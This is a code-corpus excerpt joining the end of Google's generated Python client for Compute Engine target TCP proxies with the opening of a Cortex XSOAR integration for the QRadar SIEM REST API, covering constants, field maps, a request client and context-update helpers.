target_tcp_proxies_set_backend_service_request_resource (google.cloud.compute_v1.types.TargetTcpProxiesSetBackendServiceRequest):
The body resource for this request
This corresponds to the ``target_tcp_proxies_set_backend_service_request_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[
project,
target_tcp_proxy,
target_tcp_proxies_set_backend_service_request_resource,
]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.SetBackendServiceTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.SetBackendServiceTargetTcpProxyRequest):
request = compute.SetBackendServiceTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
if target_tcp_proxies_set_backend_service_request_resource is not None:
request.target_tcp_proxies_set_backend_service_request_resource = (
target_tcp_proxies_set_backend_service_request_resource
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.set_backend_service]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def set_proxy_header_unary(
self,
request: Union[compute.SetProxyHeaderTargetTcpProxyRequest, dict] = None,
*,
project: str = None,
target_tcp_proxy: str = None,
target_tcp_proxies_set_proxy_header_request_resource: compute.TargetTcpProxiesSetProxyHeaderRequest = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> compute.Operation:
r"""Changes the ProxyHeaderType for TargetTcpProxy.
Args:
request (Union[google.cloud.compute_v1.types.SetProxyHeaderTargetTcpProxyRequest, dict]):
The request object. A request message for
TargetTcpProxies.SetProxyHeader. See the method
description for details.
project (str):
Project ID for this request.
This corresponds to the ``project`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxy (str):
Name of the TargetTcpProxy resource
whose ProxyHeader is to be set.
This corresponds to the ``target_tcp_proxy`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
target_tcp_proxies_set_proxy_header_request_resource (google.cloud.compute_v1.types.TargetTcpProxiesSetProxyHeaderRequest):
The body resource for this request
This corresponds to the ``target_tcp_proxies_set_proxy_header_request_resource`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.compute_v1.types.Operation:
Represents an Operation resource. Google Compute Engine
has three Operation resources: \*
[Global](/compute/docs/reference/rest/v1/globalOperations)
\*
[Regional](/compute/docs/reference/rest/v1/regionOperations)
\*
[Zonal](/compute/docs/reference/rest/v1/zoneOperations)
You can use an operation resource to manage asynchronous
API requests. For more information, read Handling API
responses. Operations can be global, regional or zonal.
- For global operations, use the globalOperations
resource. - For regional operations, use the
regionOperations resource. - For zonal operations, use
the zonalOperations resource. For more information, read
Global, Regional, and Zonal Resources.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[
project,
target_tcp_proxy,
target_tcp_proxies_set_proxy_header_request_resource,
]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a compute.SetProxyHeaderTargetTcpProxyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, compute.SetProxyHeaderTargetTcpProxyRequest):
request = compute.SetProxyHeaderTargetTcpProxyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project is not None:
request.project = project
if target_tcp_proxy is not None:
request.target_tcp_proxy = target_tcp_proxy
if target_tcp_proxies_set_proxy_header_request_resource is not None:
request.target_tcp_proxies_set_proxy_header_request_resource = (
target_tcp_proxies_set_proxy_header_request_resource
)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.set_proxy_header]
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-compute",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
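# --- Illustrative usage sketch (added for documentation; not part of the generated client). ---
# The docstrings above state that the flattened arguments and the `request` object are
# mutually exclusive, and that the context-manager form closes the underlying transport on
# exit. This is a minimal sketch, assuming application-default credentials are configured;
# the project and proxy names are hypothetical placeholders, and the `proxy_header` field
# value is assumed from the API reference.
def _example_set_proxy_header_usage():  # pragma: no cover - illustration only, never called
    body = compute.TargetTcpProxiesSetProxyHeaderRequest(proxy_header="PROXY_V1")
    with TargetTcpProxiesClient() as client:
        # Option 1: flattened arguments.
        operation = client.set_proxy_header(
            project="my-project",
            target_tcp_proxy="my-proxy",
            target_tcp_proxies_set_proxy_header_request_resource=body,
        )
        # Option 2: a pre-built request object (must not be combined with flattened arguments).
        request = compute.SetProxyHeaderTargetTcpProxyRequest(
            project="my-project",
            target_tcp_proxy="my-proxy",
            target_tcp_proxies_set_proxy_header_request_resource=body,
        )
        operation = client.set_proxy_header(request=request)
    return operation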
__all__ = ("TargetTcpProxiesClient",)
|
googleapis/python-compute
|
google/cloud/compute_v1/services/target_tcp_proxies/client.py
|
Python
|
apache-2.0
| 42,291
| 0.001537
|
import concurrent.futures
import secrets
from enum import Enum
from ipaddress import ip_address
from typing import Tuple, Set, Dict, Callable
from urllib import parse
import pytz
import urllib3
from CommonServerUserPython import * # noqa
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' ADVANCED GLOBAL PARAMETERS '''
SAMPLE_SIZE = 2 # number of samples to store in integration context
EVENTS_INTERVAL_SECS = 15 # interval between events polling
EVENTS_FAILURE_LIMIT = 3 # amount of consecutive failures events fetch will tolerate
FAILURE_SLEEP = 15 # sleep between consecutive failures events fetch
FETCH_SLEEP = 60 # sleep between fetches
BATCH_SIZE = 100 # batch size used for offense ip enrichment
OFF_ENRCH_LIMIT = BATCH_SIZE * 10 # max amount of IPs to enrich per offense
MAX_WORKERS = 8 # max concurrent workers used for events enriching
DOMAIN_ENRCH_FLG = 'true' # when set to true, will try to enrich offense and assets with domain names
RULES_ENRCH_FLG = 'true' # when set to true, will try to enrich offense with rule names
MAX_FETCH_EVENT_RETIRES = 3  # max iterations to try to search the events of an offense
SLEEP_FETCH_EVENT_RETIRES = 10  # sleep between iterations when trying to search the events of an offense
MAX_NUMBER_OF_OFFENSES_TO_CHECK_SEARCH = 5 # Number of offenses to check during mirroring if search was completed.
DEFAULT_EVENTS_TIMEOUT = 30 # default timeout for the events enrichment in minutes
PROFILING_DUMP_ROWS_LIMIT = 20
ADVANCED_PARAMETERS_STRING_NAMES = [
'DOMAIN_ENRCH_FLG',
'RULES_ENRCH_FLG',
]
ADVANCED_PARAMETER_INT_NAMES = [
'EVENTS_INTERVAL_SECS',
'EVENTS_FAILURE_LIMIT',
'FAILURE_SLEEP',
'FETCH_SLEEP',
'BATCH_SIZE',
'OFF_ENRCH_LIMIT',
'MAX_WORKERS',
'MAX_FETCH_EVENT_RETIRES',
'SLEEP_FETCH_EVENT_RETIRES',
'DEFAULT_EVENTS_TIMEOUT',
'PROFILING_DUMP_ROWS_LIMIT',
]
''' CONSTANTS '''
API_USERNAME = '_api_token_key'
RESET_KEY = 'reset'
LAST_FETCH_KEY = 'id'
MINIMUM_API_VERSION = 10.1
DEFAULT_RANGE_VALUE = '0-49'
DEFAULT_TIMEOUT_VALUE = '35'
DEFAULT_LIMIT_VALUE = 50
MAXIMUM_MIRROR_LIMIT = 100
DEFAULT_EVENTS_LIMIT = 20
MAXIMUM_OFFENSES_PER_FETCH = 50
DEFAULT_OFFENSES_PER_FETCH = 20
DEFAULT_MIRRORING_DIRECTION = 'No Mirroring'
MIRROR_OFFENSE_AND_EVENTS = 'Mirror Offense and Events'
MIRROR_DIRECTION: Dict[str, Optional[str]] = {
'No Mirroring': None,
'Mirror Offense': 'In',
MIRROR_OFFENSE_AND_EVENTS: 'In'
}
MIRRORED_OFFENSES_CTX_KEY = 'mirrored_offenses'
UPDATED_MIRRORED_OFFENSES_CTX_KEY = 'updated_mirrored_offenses'
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY = 'resubmitted_mirrored_offenses'
UTC_TIMEZONE = pytz.timezone('utc')
ID_QUERY_REGEX = re.compile(r'(?:\s+|^)id((\s)*)>(=?)((\s)*)((\d)+)(?:\s+|$)')
ASCENDING_ID_ORDER = '+id'
EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
''' OUTPUT FIELDS REPLACEMENT MAPS '''
OFFENSE_OLD_NEW_NAMES_MAP = {
'credibility': 'Credibility',
'relevance': 'Relevance',
'severity': 'Severity',
'assigned_to': 'AssignedTo',
'destination_networks': 'DestinationHostname',
'status': 'Status',
'closing_user': 'ClosingUser',
'closing_reason_id': 'ClosingReason',
'close_time': 'CloseTime',
'categories': 'Categories',
'follow_up': 'Followup',
'id': 'ID',
'description': 'Description',
'source_address_ids': 'SourceAddress',
'local_destination_address_ids': 'DestinationAddress',
'remote_destination_count': 'RemoteDestinationCount',
'start_time': 'StartTime',
'event_count': 'EventCount',
'flow_count': 'FlowCount',
'offense_source': 'OffenseSource',
'magnitude': 'Magnitude',
'last_updated_time': 'LastUpdatedTime',
'offense_type': 'OffenseType',
'protected': 'Protected',
'LinkToOffense': 'LinkToOffense',
'rules': 'Rules',
'domain_name': 'DomainName',
'assets': 'Assets'
}
CLOSING_REASONS_OLD_NEW_MAP = {
'id': 'ID',
'text': 'Name',
'is_reserved': 'IsReserved',
'is_deleted': 'IsDeleted'
}
NOTES_OLD_NEW_MAP = {
'id': 'ID',
'note_text': 'Text',
'create_time': 'CreateTime',
'username': 'CreatedBy'
}
RULES_OLD_NEW_MAP = {
'owner': 'Owner',
'base_host_id': 'BaseHostID',
'capacity_timestamp': 'CapacityTimestamp',
'origin': 'Origin',
'creation_date': 'CreationDate',
'type': 'Type',
'enabled': 'Enabled',
'modification_date': 'ModificationDate',
'name': 'Name',
'average_capacity': 'AverageCapacity',
'id': 'ID',
'base_capacity': 'BaseCapacity'
}
RULES_GROUP_OLD_NEW_MAP = {
'owner': 'Owner',
'modified_time': 'ModifiedTime',
'level': 'Level',
'name': 'Name',
'description': 'Description',
'id': 'ID',
'child_groups': 'ChildGroups',
'child_items': 'ChildItems',
'type': 'Type',
'parent_id': 'ParentID'
}
ASSET_OLD_NEW_MAP = {
'vulnerability_count': 'VulnerabilityCount',
'interfaces': 'Interfaces',
'risk_score_sum': 'RiskScoreSum',
'hostnames': 'Hostnames',
'id': 'ID',
'users': 'Users',
'domain_id': 'DomainID',
'properties': 'Properties',
'products': 'Products'
}
SEARCH_OLD_NEW_MAP = {'search_id': 'ID', 'status': 'Status'}
REFERENCE_SETS_OLD_NEW_MAP = {
'number_of_elements': 'NumberOfElements',
'name': 'Name',
'creation_time': 'CreationTime',
'element_type': 'ElementType',
'time_to_live': 'TimeToLive',
'timeout_type': 'TimeoutType',
'data': 'Data',
}
REFERENCE_SET_DATA_OLD_NEW_MAP = {
'last_seen': 'LastSeen',
'source': 'Source',
'value': 'Value',
'first_seen': 'FirstSeen'
}
DOMAIN_OLD_NEW_MAP = {
'asset_scanner_ids': 'AssetScannerIDs',
'custom_properties': 'CustomProperties',
'deleted': 'Deleted',
'description': 'Description',
'event_collector_ids': 'EventCollectorIDs',
'flow_collector_ids': 'FlowCollectorIDs',
'flow_source_ids': 'FlowSourceIDs',
'id': 'ID',
'log_source_ids': 'LogSourceIDs',
'log_source_group_ids': 'LogSourceGroupIDs',
'name': 'Name',
'qvm_scanner_ids': 'QVMScannerIDs',
'tenant_id': 'TenantID'
}
SAVED_SEARCH_OLD_NEW_MAP = {
'owner': 'Owner',
'description': 'Description',
'creation_date': 'CreationDate',
'uid': 'UID',
'database': 'Database',
'is_quick_search': 'QuickSearch',
'name': 'Name',
'modified_date': 'ModifiedDate',
'id': 'ID',
'aql': 'AQL',
'is_shared': 'IsShared'
}
IP_GEOLOCATION_OLD_NEW_MAP = {
'continent': 'Continent',
'traits': 'Traits',
'geo_json': 'Geolocation',
'city': 'City',
'ip_address': 'IPAddress',
'represented_country': 'RepresentedCountry',
'registered_country': 'RegisteredCountry',
'is_local': 'IsLocalCountry',
'location': 'Location',
'postal': 'Postal',
'physical_country': 'PhysicalCountry',
'subdivisions': 'SubDivisions'
}
LOG_SOURCES_OLD_NEW_MAP = {
'sending_ip': 'SendingIP',
'internal': 'Internal',
'protocol_parameters': 'ProtocolParameters',
'description': 'Description',
'enabled': 'Enabled',
'group_ids': 'GroupIDs',
'credibility': 'Credibility',
'id': 'ID',
'protocol_type_id': 'ProtocolTypeID',
'creation_date': 'CreationDate',
'name': 'Name',
'modified_date': 'ModifiedDate',
'auto_discovered': 'AutoDiscovered',
'type_id': 'TypeID',
'last_event_time': 'LastEventTime',
'gateway': 'Gateway',
'status': 'Status'
}
USECS_ENTRIES = {'last_persisted_time',
'start_time',
'close_time',
'create_time',
'creation_time',
'creation_date',
'last_updated_time',
'first_persisted_time',
'modification_date',
'last_seen',
'first_seen',
'starttime',
'devicetime',
'last_reported',
'created',
'last_seen_profiler',
'last_seen_scanner',
'first_seen_scanner',
'first_seen_profiler',
'modified_time',
'last_event_time',
'modified_date',
'first_event_flow_seen',
'last_event_flow_seen'}
LOCAL_DESTINATION_IPS_OLD_NEW_MAP = {
'domain_id': 'DomainID',
'event_flow_count': 'EventFlowCount',
'first_event_flow_seen': 'FirstEventFlowSeen',
'id': 'ID',
'last_event_flow_seen': 'LastEventFlowSeen',
'local_destination_ip': 'LocalDestinationIP',
'magnitude': 'Magnitude',
'network': 'Network',
'offense_ids': 'OffenseIDs',
'source_address_ids': 'SourceAddressIDs'
}
SOURCE_IPS_OLD_NEW_MAP = {
'domain_id': 'DomainID',
'event_flow_count': 'EventFlowCount',
'first_event_flow_seen': 'FirstEventFlowSeen',
'id': 'ID',
'last_event_flow_seen': 'LastEventFlowSeen',
'local_destination_address_ids': 'LocalDestinationAddressIDs',
'magnitude': 'Magnitude',
'network': 'Network',
'offense_ids': 'OffenseIDs',
'source_ip': 'SourceIP'
}
''' ENRICHMENT MAPS '''
ASSET_PROPERTIES_NAME_MAP = {
'Unified Name': 'Name',
'CVSS Collateral Damage Potential': 'AggregatedCVSSScore',
'Weight': 'Weight'
}
FULL_ASSET_PROPERTIES_NAMES_MAP = {
'Compliance Notes': 'ComplianceNotes',
'Compliance Plan': 'CompliancePlan',
'Location': 'Location',
'Switch ID': 'SwitchID',
'Switch Port ID': 'SwitchPort',
'Group Name': 'GroupName',
'Vulnerabilities': 'Vulnerabilities',
}
LONG_RUNNING_REQUIRED_PARAMS = {'fetch_mode': 'Fetch mode',
'offenses_per_fetch': 'Number of offenses to pull per API call (max 50)',
'events_limit': 'Maximum number of events per incident.'}
''' ENUMS '''
class FetchMode(Enum):
"""
Enums for the options of fetching the incidents.
"""
no_events = 'Fetch Without Events'
all_events = 'Fetch With All Events'
correlations_events_only = 'Fetch Correlation Events Only'
''' CLIENT CLASS '''
class Client(BaseClient):
def __init__(self, server: str, verify: bool, proxy: bool, api_version: str, credentials: Dict):
username = credentials.get('identifier')
password = credentials.get('password')
if username == API_USERNAME:
self.base_headers = {'Version': api_version, 'SEC': password}
auth = None
else:
auth = (username, password)
self.base_headers = {'Version': api_version}
base_url = urljoin(server, '/api')
super().__init__(base_url=base_url, verify=verify, proxy=proxy, auth=auth)
self.password = password
self.server = server
def http_request(self, method: str, url_suffix: str, params: Optional[Dict] = None,
json_data: Optional[Dict] = None, additional_headers: Optional[Dict] = None,
timeout: Optional[int] = None):
headers = {**additional_headers, **self.base_headers} if additional_headers else self.base_headers
return self._http_request(
method=method,
url_suffix=url_suffix,
params=params,
json_data=json_data,
headers=headers,
error_handler=self.qradar_error_handler,
timeout=timeout
)
@staticmethod
def qradar_error_handler(res: requests.Response):
"""
        QRadar error handler for any error that occurred during the API request.
        This function's job is to translate the known exceptions returned by QRadar
        into human-readable exceptions, to help the user understand why the request failed.
        If the returned error is not in the expected error format, the exception is raised as is.
Args:
res (Any): The error response returned by QRadar.
Returns:
- raises DemistoException.
"""
err_msg = f'Error in API call [{res.status_code}] - {res.reason}'
try:
# Try to parse json error response
error_entry = res.json()
message = error_entry.get('message', '')
if 'items=x-y' in message:
message = 'Failed to parse Range argument. The syntax of the Range argument must follow this pattern:' \
' x-y'
elif 'unauthorized to access' in err_msg or 'No SEC header present in request' in err_msg:
message = 'Authorization Error: make sure credentials are correct.'
elif 'The specified encryption strength is not available' in err_msg:
err_msg = ''
message = 'The specified encryption is not available, try using a weaker encryption (AES128).'
elif 'User has insufficient capabilities to access this endpoint resource' in message:
                message = 'The given credentials do not have the needed permissions to perform the call to the endpoint' \
f'\n{res.request.path_url}.\n' \
'Please supply credentials with the needed permissions as can be seen in the integration ' \
'description, or do not call or enrich offenses with the mentioned endpoint.'
err_msg += f'\n{message}'
raise DemistoException(err_msg, res=res)
except ValueError:
err_msg += '\n{}'.format(res.text)
raise DemistoException(err_msg, res=res)
def offenses_list(self, range_: Optional[str] = None, offense_id: Optional[int] = None,
filter_: Optional[str] = None, fields: Optional[str] = None, sort: Optional[str] = None):
id_suffix = f'/{offense_id}' if offense_id else ''
params = assign_params(fields=fields) if offense_id else assign_params(filter=filter_, fields=fields, sort=sort)
additional_headers = {'Range': range_} if not offense_id else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offenses{id_suffix}',
params=params,
additional_headers=additional_headers
)
def offense_update(self, offense_id: int, protected: Optional[str] = None, follow_up: Optional[str] = None,
status: Optional[str] = None, closing_reason_id: Optional[int] = None,
assigned_to: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/siem/offenses/{offense_id}',
params=assign_params(
protected=protected,
follow_up=follow_up,
status=status,
closing_reason_id=closing_reason_id,
assigned_to=assigned_to,
fields=fields
)
)
def closing_reasons_list(self, closing_reason_id: Optional[int] = None, include_reserved: Optional[bool] = None,
include_deleted: Optional[bool] = None, range_: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
id_suffix = f'/{closing_reason_id}' if closing_reason_id else ''
params = assign_params(fields=fields) if closing_reason_id else assign_params(include_reserved=include_reserved,
include_deleted=include_deleted,
filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not closing_reason_id and range_ else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offense_closing_reasons{id_suffix}',
additional_headers=additional_headers,
params=params
)
def offense_notes_list(self, offense_id: int, range_: str, note_id: Optional[int] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
note_id_suffix = f'/{note_id}' if note_id else ''
params = assign_params(fields=fields) if note_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not note_id else None
return self.http_request(
method='GET',
url_suffix=f'/siem/offenses/{offense_id}/notes{note_id_suffix}',
additional_headers=additional_headers,
params=params
)
def offense_notes_create(self, offense_id: int, note_text: str, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/siem/offenses/{offense_id}/notes',
params=assign_params(note_text=note_text, fields=fields)
)
def rules_list(self, rule_id: Optional[str] = None, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{rule_id}' if rule_id else ''
params = assign_params(fields=fields) if rule_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if range_ and not rule_id else None
return self.http_request(
method='GET',
url_suffix=f'/analytics/rules{id_suffix}',
params=params,
additional_headers=additional_headers
)
def rule_groups_list(self, range_: str, rule_group_id: Optional[int] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{rule_group_id}' if rule_group_id else ''
additional_headers = {'Range': range_} if not rule_group_id else None
params = assign_params(fields=fields) if rule_group_id else assign_params(filter=filter_, fields=fields)
return self.http_request(
method='GET',
url_suffix=f'/analytics/rule_groups{id_suffix}',
additional_headers=additional_headers,
params=params
)
def assets_list(self, range_: Optional[str] = None, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/asset_model/assets',
additional_headers={'Range': range_},
params=assign_params(filter=filter_, fields=fields)
)
def saved_searches_list(self, range_: str, timeout: Optional[int], saved_search_id: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
id_suffix = f'/{saved_search_id}' if saved_search_id else ''
params = assign_params(fields=fields) if saved_search_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not saved_search_id else None
return self.http_request(
method='GET',
url_suffix=f'/ariel/saved_searches{id_suffix}',
additional_headers=additional_headers,
params=params,
timeout=timeout
)
def searches_list(self, range_: str, filter_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/ariel/searches',
additional_headers={'Range': range_},
params=assign_params(filter=filter_)
)
def search_create(self, query_expression: Optional[str] = None, saved_search_id: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix='/ariel/searches',
params=assign_params(
query_expression=query_expression,
saved_search_id=saved_search_id
)
)
def search_status_get(self, search_id: str):
return self.http_request(
method='GET',
url_suffix=f'/ariel/searches/{search_id}',
)
def search_results_get(self, search_id: str, range_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix=f'/ariel/searches/{search_id}/results',
additional_headers={'Range': range_} if range_ else None
)
def reference_sets_list(self, range_: Optional[str] = None, ref_name: Optional[str] = None,
filter_: Optional[str] = None, fields: Optional[str] = None):
name_suffix = f'/{parse.quote(ref_name, safe="")}' if ref_name else ''
params = assign_params(fields=fields) if ref_name else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not ref_name else None
return self.http_request(
method='GET',
url_suffix=f'/reference_data/sets{name_suffix}',
params=params,
additional_headers=additional_headers
)
def reference_set_create(self, ref_name: str, element_type: str, timeout_type: Optional[str] = None,
time_to_live: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix='/reference_data/sets',
params=assign_params(
name=ref_name,
element_type=element_type,
timeout_type=timeout_type,
time_to_live=time_to_live,
fields=fields
)
)
def reference_set_delete(self, ref_name: str, purge_only: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='DELETE',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}',
params=assign_params(purge_only=purge_only, fields=fields)
)
def reference_set_value_upsert(self, ref_name: str, value: str, source: Optional[str] = None,
fields: Optional[str] = None):
return self.http_request(
method='POST',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}',
params=assign_params(value=value, source=source, fields=fields)
)
def reference_set_value_delete(self, ref_name: str, value: str):
return self.http_request(
method='DELETE',
url_suffix=f'/reference_data/sets/{parse.quote(ref_name, safe="")}/{value}'
)
def domains_list(self, domain_id: Optional[int] = None, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
id_suffix = f'/{domain_id}' if domain_id else ''
params = assign_params(fields=fields) if domain_id else assign_params(filter=filter_, fields=fields)
additional_headers = {'Range': range_} if not domain_id and range_ else None
return self.http_request(
method='GET',
url_suffix=f'/config/domain_management/domains{id_suffix}',
additional_headers=additional_headers,
params=params
)
def indicators_upload(self, ref_name: str, indicators: Any, fields: Optional[str] = None):
headers = {
'Content-Type': 'application/json'
}
if fields:
headers['fields'] = fields
return self.http_request(
method='POST',
url_suffix=f'/reference_data/sets/bulk_load/{parse.quote(ref_name, safe="")}',
json_data=indicators,
additional_headers=headers
)
def geolocations_for_ip(self, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/services/geolocations',
params=assign_params(filter=filter_, fields=fields)
)
def log_sources_list(self, qrd_encryption_algorithm: str, qrd_encryption_password: str,
range_: str, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/config/event_sources/log_source_management/log_sources',
params=assign_params(filter=filter_, fields=fields),
additional_headers={
'x-qrd-encryption-algorithm': qrd_encryption_algorithm,
'x-qrd-encryption-password': qrd_encryption_password,
'Range': range_
}
)
def custom_properties(self, range_: Optional[str] = None, filter_: Optional[str] = None,
fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/config/event_sources/custom_properties/regex_properties',
params=assign_params(filter=filter_, fields=fields),
additional_headers={'Range': range_} if range_ else None
)
def offense_types(self, filter_: Optional[str] = None, fields: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix='/siem/offense_types',
params=assign_params(filter=filter_, fields=fields)
)
def get_addresses(self, address_suffix: str, filter_: Optional[str] = None, fields: Optional[str] = None,
range_: Optional[str] = None):
return self.http_request(
method='GET',
url_suffix=f'/siem/{address_suffix}',
params=assign_params(filter=filter_, fields=fields),
additional_headers={'Range': range_} if range_ else None
)
def test_connection(self):
"""
Test connection with databases (should always be up)
"""
self.http_request(method='GET', url_suffix='/ariel/databases')
return 'ok'
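# --- Illustrative sketch (added for documentation; never executed). ---
# The Client constructor above switches between two authentication modes: when the
# configured username equals API_USERNAME ('_api_token_key'), the password is sent as a
# 'SEC' API-token header and no basic auth is used; otherwise plain basic authentication
# is used. The server address, API version and credential values below are hypothetical.
def _example_client_construction():  # pragma: no cover - illustration only, never called
    token_client = Client(
        server='https://qradar.example.com',
        verify=False,
        proxy=False,
        api_version='14.0',
        credentials={'identifier': API_USERNAME, 'password': 'my-api-token'},  # SEC header auth
    )
    basic_auth_client = Client(
        server='https://qradar.example.com',
        verify=False,
        proxy=False,
        api_version='14.0',
        credentials={'identifier': 'admin', 'password': 'secret'},  # basic authentication
    )
    return token_client, basic_auth_client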
''' HELPER FUNCTIONS '''
def safely_update_context_data(func: Callable):
"""Decorator for updating context data using versions.
    In case of a race condition, perform func with the new context_data and try updating again.
    Args:
        func: The function to perform with the new context data before updating.
    Raises ValueError if context_data or version are not in the kwargs of the function.
    Raises DemistoException if the maximum number of retries is reached.
"""
def wrapper(*args, **kwargs):
context_was_set = False
retries = 0
max_retries = 5
return_value = None
while not context_was_set and retries < max_retries:
context_data, version, return_value = func(*args, **kwargs)
print_debug_msg(f'Attempting to update context data after version {version} with retry {retries}')
new_context_data, new_version = get_integration_context_with_version()
if new_version == version:
try:
set_to_integration_context_with_retries(context_data, max_retry_times=1)
context_was_set = True
print_debug_msg(f'Updated integration context after version {version} in retry {retries}.')
except Exception as e:
if 'Max retry attempts exceeded' in str(e):
continue
else:
raise e
else:
if 'context_data' not in kwargs or 'version' not in kwargs:
raise ValueError('context_data and version must be in the func kwargs if '
'safely_update_context_data decorator is used but were not found.')
else:
kwargs['context_data'] = extract_context_data(new_context_data)
kwargs['version'] = new_version
print_debug_msg(f'Could not update context data after version {version} due to new '
f'version {new_version} in retry {retries}')
retries = retries + 1
if retries == max_retries:
raise DemistoException(f'Reached maximum retries, could not update context data for function {func}.')
return return_value
return wrapper
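# --- Illustrative sketch (added for documentation; the decorated function is never called). ---
# A function decorated with safely_update_context_data must accept 'context_data' and
# 'version' as keyword arguments and return a (new_context_data, version, return_value)
# tuple; the decorator retries the write when another container bumped the context version
# in the meantime. The function name and the stored-key usage below are hypothetical.
@safely_update_context_data
def _example_record_highest_fetched_id(new_id: int, context_data: Optional[dict] = None, version: Any = None):
    # pragma: no cover - illustration only, never called
    updated_context = dict(context_data or {})
    updated_context[LAST_FETCH_KEY] = new_id
    return updated_context, version, new_id
# Hypothetical call: _example_record_highest_fetched_id(42, context_data=ctx, version=ctx_version)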
def add_iso_entries_to_dict(dicts: List[Dict]) -> List[Dict]:
"""
    Takes a list of dicts and, for each dict, creates a new dict in which every field
    contained in 'USECS_ENTRIES' is mapped to the ISO-format representation of its value.
Args:
dicts (List[Dict]): List of the dicts to be transformed.
Returns:
(List[Dict]): New dicts with iso entries for the corresponding items in 'USECS_ENTRIES'
"""
return [{k: (get_time_parameter(v, iso_format=True) if k in USECS_ENTRIES else v)
for k, v in dict_.items()} for dict_ in dicts]
def sanitize_outputs(outputs: Any, key_replace_dict: Optional[Dict] = None) -> List[Dict]:
"""
    Gets a list of all the outputs and sanitizes them:
    - Removes empty elements.
    - Adds ISO entries to the outputs.
    - If 'key_replace_dict' is not None, keeps only the keys found in 'key_replace_dict',
      renaming them to the corresponding 'key_replace_dict' values.
